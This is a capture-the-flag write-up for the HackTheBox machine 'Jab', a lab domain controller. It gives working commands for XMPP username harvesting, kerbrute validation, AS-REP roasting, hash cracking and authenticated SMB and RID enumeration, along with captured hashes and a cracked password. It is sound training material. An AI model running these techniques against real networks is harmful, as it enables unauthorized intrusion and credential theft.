# Jab - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Jab is a fun, medium-rated Windows machine created by [mrb3n](https://x.com/mrb3n813)

The foothold involves dumping usernames from XMPP, AS-REProasting, and code execution by instantiating a COM object and invoking its methods (thanks to the perks of `Distributed COM Users` group)  
Afterwards, credential reuse on Openfire Admin Console and malicious plugin upload lead to escalation of privileges.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.19s latency).
Not shown: 64141 closed tcp ports (reset), 1359 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5222/tcp  open  xmpp-client
5223/tcp  open  hpvirtgrp
5262/tcp  open  unknown
5263/tcp  open  unknown
5269/tcp  open  xmpp-server
5270/tcp  open  xmp
5275/tcp  open  unknown
5985/tcp  open  wsman
7070/tcp  open  realserver
7443/tcp  open  oracleas-https
7777/tcp  open  cbt
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49686/tcp open  unknown
49687/tcp open  unknown
49688/tcp open  unknown
49699/tcp open  unknown
49762/tcp open  unknown
60795/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49689,49762,60795 -oN jab.nmap 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.18s latency).

PORT      STATE  SERVICE             VERSION
53/tcp    open   domain              Simple DNS Plus
88/tcp    open   kerberos-sec        Microsoft Windows Kerberos (server time: 2024-02-24 19:06:50Z)
135/tcp   open   msrpc               Microsoft Windows RPC
139/tcp   open   netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open   ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-24T19:08:15+00:00; -9s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-02-24T19:08:14+00:00; -9s from scanner time.
3268/tcp  open   ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-24T19:08:15+00:00; -9s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
3269/tcp  open   ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-02-24T19:08:14+00:00; -9s from scanner time.
5222/tcp  open   jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     features: 
|     auth_mechanisms: 
|     unknown: 
|     xmpp: 
|       version: 1.0
|     stream_id: 2vj1p173yd
|     compression_methods: 
|_    capabilities: 
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5223/tcp  open   ssl/jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     features: 
|     unknown: 
|     xmpp: 
|     auth_mechanisms: 
|     compression_methods: 
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5262/tcp  open   jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     features: 
|     auth_mechanisms: 
|     unknown: 
|     xmpp: 
|       version: 1.0
|     stream_id: 3g1g3finwb
|     compression_methods: 
|_    capabilities: 
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp  open   ssl/jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     features: 
|     unknown: 
|     xmpp: 
|     auth_mechanisms: 
|     compression_methods: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5269/tcp  open   xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     features: 
|     unknown: 
|     xmpp: 
|     auth_mechanisms: 
|     compression_methods: 
|_    capabilities: 
5270/tcp  open   ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5275/tcp  open   jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     features: 
|     auth_mechanisms: 
|     unknown: 
|     xmpp: 
|       version: 1.0
|     stream_id: 5zr38x2o6b
|     compression_methods: 
|_    capabilities: 
5985/tcp  open   http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
7070/tcp  open   realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 24 Feb 2024 19:06:49 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 24 Feb 2024 19:06:56 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open   ssl/oracleas-https?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 24 Feb 2024 19:06:57 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 24 Feb 2024 19:07:03 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
7777/tcp  open   socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info: 
|_  No authentication
9389/tcp  open   mc-nmf              .NET Message Framing
47001/tcp open   http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open   msrpc               Microsoft Windows RPC
49665/tcp open   msrpc               Microsoft Windows RPC
49666/tcp open   msrpc               Microsoft Windows RPC
49667/tcp open   msrpc               Microsoft Windows RPC
49671/tcp open   msrpc               Microsoft Windows RPC
49686/tcp open   ncacn_http          Microsoft Windows RPC over HTTP 1.0
49687/tcp open   msrpc               Microsoft Windows RPC
49688/tcp open   msrpc               Microsoft Windows RPC
49689/tcp closed unknown
49762/tcp open   msrpc               Microsoft Windows RPC
60795/tcp open   msrpc               Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-24T19:07:59
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: -9s, deviation: 0s, median: -9s
```

DNS, Kerberos, SMB, RPC, LDAP, WinRM, and other ports are open. It is likely a DC.  
We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.4 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=jab,DC=htb
ldapServiceName: jab.htb:dc01$@JAB.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=jab,DC=htb
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=jab,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=jab,DC=htb
namingContexts: DC=jab,DC=htb
namingContexts: CN=Configuration,DC=jab,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=jab,DC=htb
namingContexts: DC=DomainDnsZones,DC=jab,DC=htb
namingContexts: DC=ForestDnsZones,DC=jab,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 266909
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=jab,DC=htb
dnsHostName: DC01.jab.htb
defaultNamingContext: DC=jab,DC=htb
currentTime: 20240224191748.0Z
configurationNamingContext: CN=Configuration,DC=jab,DC=htb
```

Since the dnsHostName is set to FQDN `DC01.jab.htb`, we can add it to `/etc/hosts`:

```text
10.10.11.4 DC01.jab.htb jab.htb DC01
```

## SMB enumeration

I prefer [NetExec](https://github.com/Pennyw0rth/NetExec) to enumerate SMB:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@dc3c918ab8f5:~# echo '10.10.11.4 DC01.jab.htb jab.htb DC01' >> /etc/hosts
```

Null sessions are disabled:

```console
root@dc3c918ab8f5:~# nxc smb 10.10.11.4 -d jab.htb -u '' -p '' --shares
SMB         10.10.11.4  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4  445    DC01             [+] jab.htb\: 
SMB         10.10.11.4  445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Guest sessions are also disabled:

```console
root@dc3c918ab8f5:~# nxc smb 10.10.11.4 -d jab.htb -u 'opcode' -p '' --shares
SMB         10.10.11.4  445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4  445    DC01             [-] jab.htb\opcode: STATUS_LOGON_FAILURE 
```

I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for `rpcclient` enumeration, but it wasn't helpful.

## XMPP (Jabber)

The ports 5222, 5223, 5262, 5263, 5269, 5270, 5275, 7070, and 7443 are all related to XMPP (Jabber)  
Googling about XMPP pentesting, I found <https://bishopfox.com/blog/xmpp-underappreciated-attack-surface>

There are several XMPP clients available, but `pidgin` is being used in the article:

```console
opcode@debian$ sudo apt install pidgin
opcode@debian$ pidgin
```

Click `Add` to get started.

![1](images/1.png)

For protocol, choose `XMPP`, set credentials to `opcode:opcode` and set `domain` to `jab.htb`  
Also, select the checkbox `Create this new account on the server`

![2](images/2.png)

In the `Advanced` tab, change `Connection Security` to `Use encryption if possible` from `Require encryption`.  
Select the checkbox `Allow plaintext auth over unencrypted streams` and click `Add`.

![3](images/3.png)

Accept the certificate:

![4](images/4.png)

When asked for XMPP Client Registration, use credentials `opcode:opcode` with email `opcode@jab.htb` and fullname `opcode`.  
After the registration is successful, select the checkbox to enable the account `opcode@jab.htb`

![5](images/5.png)

Afterwards, I was able to access the `Buddy List` in `pidgin`. However, unlike the example in the blog, it was empty.  
I also tried using the `Join a Chat` option (<kbd>Ctrl</kbd> + <kbd>C</kbd>). I then clicked on `Room List`:

![6](images/6.png)

It asks for a `Conference Server`, yet auto-fills the value to `conference.jab.htb`. Using that, it finds the rooms `test` and `test2`.  
I could not join `test`, but `test2` was accessible. There's nothing useful in `test2` either.

![7](images/7.png)

Another use for XMPP in the Bishop Fox article was username enumeration.  
We can search for users under `Accounts` > `opcode@jab.htb/ (XMPP)` > `Search for Users`. It autofills the user directory to `search.jab.htb`  
When searched for `*`, hundreds of users are returned:

![8](images/8.png)

I obtained the list of usernames, but parsing them to text would be a challenge.  
My first idea was to look for alternate XMPP clients. I found `profanity`, a fully text-based client.  
I looked through the entire documentation but found nothing that could be used for searching.  
Unfortunately, it does not have any support for the extension `XEP-0055: Jabber Search`  
I also tried some other clients, but none supported the search extension.

One approach for parsing is to use a proxy. But it seemed too complicated, so I ditched the idea.  
Another approach involves using the `XMPP Console`. We can enable it under `Tools` > `Plugins`

![9](images/9.png)

Once enabled, the console can be opened from `Tools` > `XMPP Console` > `XMPP Console`.  
If we perform the user search again, the entire result gets logged in `XMPP Console`, which we can <kbd>Ctrl</kbd>+<kbd>A</kbd> <kbd>Ctrl</kbd>+<kbd>C</kbd>

I used a ChatGPT regex to grep out the usernames:

```console
opcode@debian$ grep -oP '(?<=<value>)[^<]+(?=</value>)' userdata.xml | grep -E '^[a-zA-Z0-9_]+$' > users.txt
```

Now, `kerbrute` can be used to validate those usernames:

```console
opcode@debian$ sudo ntpdate jab.htb
opcode@debian$ kerbrute userenum ~/users.txt --dc 10.10.11.4 -d jab.htb -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/27/24 - Ronnie Flathers @ropnop

2024/02/27 01:06:16 >  Using KDC(s):
2024/02/27 01:06:16 >   10.10.11.4:88

2024/02/27 01:06:17 >  [+] VALID USERNAME:   mhernandez@jab.htb
2024/02/27 01:06:17 >  [+] VALID USERNAME:   pparodi@jab.htb
2024/02/27 01:06:17 >  [+] VALID USERNAME:   atorres@jab.htb
2024/02/27 01:06:17 >  [+] VALID USERNAME:   pwoodland@jab.htb
[--SNIP--]
2024/02/27 01:07:08 >  [+] VALID USERNAME:   kconnally@jab.htb
2024/02/27 01:07:08 >  [+] VALID USERNAME:   acarpenter@jab.htb
2024/02/27 01:07:08 >  [+] VALID USERNAME:   rpace@jab.htb
2024/02/27 01:07:08 >  Done! Tested 2686 usernames (2682 valid) in 51.196 seconds
```

Of those 4 invalid usernames, two are `opcode`, one is `admin` and the last is `wlee`, who is locked out.

## AS-REP roasting

With the usernames at hand, we can try roasting AS-REPs:

```console
opcode@debian$ GetNPUsers.py jab.htb/ -usersfile users.txt -outputfile hash -format john
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] User lmccarty doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nenglert doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User aslater doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rtruelove doesn't have UF_DONT_REQUIRE_PREAUTH set
[--SNIP--]
$krb5asrep$jmontgomery@JAB.HTB:f369baa7cc2733d5081162d2ef22db4e$c4c12eccb4c429528e8985c9f659fe03ba1ebfd811a6a444aa2607141646ef3034c9970b75d776e3a9e8816f3f9ed425f155044c436c9cea742fcdb721ca2fe0a8c95d0e1e5d8d17edacbaf6ae3aa79ee206d5dfaf931d40a54c8a6bd492283d697e1ae9e2b89305f1f4c8f8feb46f8c03dad52cf83334f523f434b2ba0697f07b5ec6832d41b9fa0362403e32eded265b2f50158a1078230c800fa78d5b45ecab0bf94db4ba184ded3ebc6d434135d61a9b5d1933547d64aae5ec61914073c8abd653ef87d90c8cdec328e183e402a662ff7de0dccf5239925fb7f15cea5af1836c
[--SNIP--]
$krb5asrep$lbradford@JAB.HTB:019f677f66daf772c4e3ce1acebe9410$7527915721179040aa549cd7eb8c80eabe681ce8b4dca666b7d92f7230dbda8f200ca4f1141b037b3c58ecea71980024ff288b0cd0c618b90d6fa9c7bfe6c16bf5b2db3774232a14e96b1ca1d152ef913ce0b860a6dbc78fe8ff682cce779d858c6799a2f4385b133e0020daa93b7a0f9953eebabca65be911ec553f5d8865c992169c5d6dfabc37a1e22dc2c7b432a8f1ecabc29ff42bff1cdddb705de7920af252fd8c2e39015e26bddee153263bfce70c7e709e2f63e139bd1a3204c5e7f9299b274f184807d1ee0cd5b32da52349edc3e77d6d5b024bd4dbf5ee05b3b6341e6c
[--SNIP--]
$krb5asrep$mlowe@JAB.HTB:149ef0ee5e059c7f05ebd1e4e1ea93a1$05f7f740cecb7b6d1b72fc7dd70c5b2692403598f41aa5d47c33cf7edcfa2eb9ed7100cc1eacc94ad788f81697170b0f5c90ba188eb56389ef8bf78e305d44d2c674bd33a851ff80971186ce98c627a53822f2e87c8b7fdffe4ac7b6b1ce434e3eef727c628a8cd8b5634bf35ed02d4b564aa6fc0008618d7a782120c87f289b7aa5ffda1e3d22d3596e9e569878328af884792bd20522270b849eca2596abd8cb752d4cbcefe9e36458ac5762c7fd40a54ffd5dc560e6223010600eb122e84d11ac264e3f5ff1bd4136923d8bb3e652d3a12ec5071a216a5289a5277c1fd383e7d1
[--SNIP--]
```

It took a long while to run, but I found three accounts with pre-authentication disabled.  
We can try cracking the hashes with `john`:

```console
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

One of them cracked:

```text
Midnight_121     ($krb5asrep$jmontgomery@JAB.HTB)
```

## Post-credential AD enumeration

Now that we have a set of credentials, we can enumerate more.  
Starting with SMB shares:

```console
root@dc3c918ab8f5:~# nxc smb 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121 
SMB         10.10.11.4      445    DC01             [*] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share 
```

Other than `IPC$`, no useful shares are readable.  
RID cycling:

```console
root@dc3c918ab8f5:~# nxc smb 10.10.11.4 -d jab.htb -u 'jmontgomery' -p 'Midnight_121' --rid-brute 10000
SMB         10.10.11.4   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4   445    DC01             [+] jab.htb\jmontgomery:Midnight_121 
[--SNIP--]
SMB         10.10.11.4   445    DC01             1104: JAB\svc_openfire (SidTypeUser)
SMB         10.10.11.4   445    DC01             1105: JAB\svc_ldap (SidTypeUser)
SMB         10.10.11.4   445    DC01             1107: JAB\Contractors (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1108: JAB\Accounting (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1109: JAB\Engineering (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1110: JAB\Executives (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1111: JAB\Human Resources (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1112: JAB\Marketing (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1113: JAB\Operations (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1114: JAB\Project Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1115: JAB\Sales (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1116: JAB\Senior Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1117: JAB\Service Accounts (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1118: JAB\Information Technology (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1119: JAB\Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1120: JAB\Tier 1 Admins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1121: JAB\Tier 2 Admins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1122: JAB\Tier 3 Admins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1123: JAB\Tier 4 Admins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1124: JAB\Help Desk Level 1 (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1125: JAB\Local Admins (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1126: JAB\Executive Assistants (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1127: JAB\CEO (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1128: JAB\CFO (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1129: JAB\CTO (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1130: JAB\Computer Group Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1131: JAB\Exchange Administrator (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1132: JAB\Exchange User Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1133: JAB\Groups Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1134: JAB\High-Impact Server Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1135: JAB\Low-Impact Server Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1136: JAB\Medium-Impact Server Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1137: JAB\Mission-Critical Server Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1138: JAB\Lync Administrator (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1139: JAB\RBAC Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1140: JAB\Restricted Users Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1141: JAB\Role Group Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1142: JAB\Servers Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1143: JAB\Skype User Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1144: JAB\Standard Computers Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1145: JAB\Tier Admin Users Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1146: JAB\Fileshare Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1147: JAB\Distribution Group Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1148: JAB\GPO Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1149: JAB\Standard Users Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1150: JAB\Users Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1151: JAB\Print Service Management (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1152: JAB\Finance (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1153: JAB\Purchasing (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1154: JAB\Shipping (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1155: JAB\Warehouse (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1156: JAB\File Share Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1157: JAB\File Share F Drive (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1158: JAB\File Share G Drive (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1159: JAB\File Share H Drive (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1160: JAB\File Share J Drive (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1161: JAB\Printer Access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1162: JAB\MFP Access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1163: JAB\ERP Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1164: JAB\ERP Payment Access (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1165: JAB\ERP Sales (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1166: JAB\ERP Read (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1167: JAB\Sales Report Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1168: JAB\Sales Report Read (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1169: JAB\Inventory Report Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1170: JAB\Inventory Report Read (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1171: JAB\PLM Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1172: JAB\PLM RW (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1173: JAB\PLM Read (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1174: JAB\Server Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1175: JAB\Desktop Admin (SidTypeGroup)
SMB         10.10.11.4   445    DC01             1176: JAB\Merch App Admin (SidTypeGroup)
